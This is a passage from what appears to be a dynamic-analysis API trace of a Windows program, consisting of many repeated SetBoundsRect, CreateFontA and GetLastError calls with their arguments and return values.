(hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x30a0862 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x70a0860 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a0865 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0866 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0867 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0868 [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0869 [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a086a [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a086b [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a086c [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a086d [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a086e [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a086f [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0870 [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0871 [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0872 [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.370] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0873 [0037.370] GetLastError () returned 0x715 [0037.370] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0874 [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0875 [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0876 [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0877 [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0878 [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0879 [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a087a [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a087b [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a087c [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a087d [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a087e [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.371] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a087f [0037.371] GetLastError () returned 0x715 [0037.371] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0880 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0881 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0882 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0883 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0884 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0885 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0886 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0887 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0888 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0889 [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a088a [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.372] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a088b [0037.372] GetLastError () returned 0x715 [0037.372] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a088c [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a088d [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a088e [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a088f [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0890 [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0891 [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0892 [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0893 [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0894 [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0895 [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0896 [0037.373] GetLastError () returned 0x715 [0037.373] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.373] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0897 [0037.373] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0898 [0037.374] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a0899 [0037.374] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a089a [0037.374] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a089b [0037.374] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a089c [0037.374] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a089d [0037.374] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a089e [0037.374] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a089f [0037.374] GetLastError () returned 0x715 [0037.374] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.374] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a0 [0037.374] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a1 [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a2 [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a3 [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a4 [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a5 [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a6 [0037.375] GetLastError () returned 0x715 